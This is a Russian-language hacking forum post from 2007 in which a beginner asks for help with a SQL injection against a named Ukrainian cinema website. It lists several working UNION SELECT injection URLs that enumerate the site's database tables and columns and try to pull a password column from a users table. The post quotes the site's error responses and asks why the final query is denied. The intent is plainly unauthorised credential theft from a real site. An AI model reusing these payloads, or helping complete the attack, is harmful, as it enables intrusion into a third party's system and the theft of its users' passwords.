Sql проклятый)

Sql проклятый)

07.10.2007, 01:19

nikoTM

Познающий

Регистрация: 25.09.2007

Сообщений: 42

С нами: 9803665

Репутация: 22

Sql проклятый)

Прет Всем!)

Ребят я зараниее предупреждаю что я новичок в этом..так что не грубить, а понимать)

Так вот. Вчера один чел(тоже новичок) дал мне одну ссылку на скуль иньекцию...
вот

Цитата:

http://www.kino-ukraina.com.ua/news/?nid=-1'+union+select+1,2,3,database(),5,user()/*

ну мы начели капать что как ..хотели найти пассворд и т.д. .... так искали где то час или больше ) без результатно..потом я предложил такой способ

Цитата:

http://www.kino-ukraina.com.ua/news/?nid=-1'+UNION+SELECT+1,2,3,COLUMN_NAME,5,6+FROM+INFORMA TION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='users'+LIMIT +1,1/*

поскольно у него выделенка

) он быстрее подобрал)..
оказалось LIMIT 3,1 типо 3-ая колонка - pwd ..
но при вводе

Цитата:

http://www.kino-ukraina.com.ua/news/?nid=-1'+UNION+SELECT+1,2,3,pwd,5,6+From+users/*

выводится "getLink fatal error: Table 'kinosite.users' doesn't exist"

отсюда я понял что надо найти какую то замену типо ***.users в местно киносайт ( правдно я этот момент не до конца поянл почиму так

)..ну начал подбирать таблицы своими руками

в стиле

Цитата:

http://www.kino-ukraina.com.ua/news/?nid=-1'+UNION+SELECT+1,2,3,TABLE_NAME,5,6+FROM+INFORMAT ION_SCHEMA.TABLES+LIMIT+1,1/*

дошел до 39...и нашел там Users но по неизвестной мне причине при

Цитата:

http://www.kino-ukraina.com.ua/news/?nid=-1'+UNION+SELECT+1,2,3,pwd,5,6+From+Users.users/*

выводится ошибка

Цитата:

getLink fatal error: SELECT command denied to user 'site'@'localhost' for table 'users'

плз скажите в чем моя ошибка?(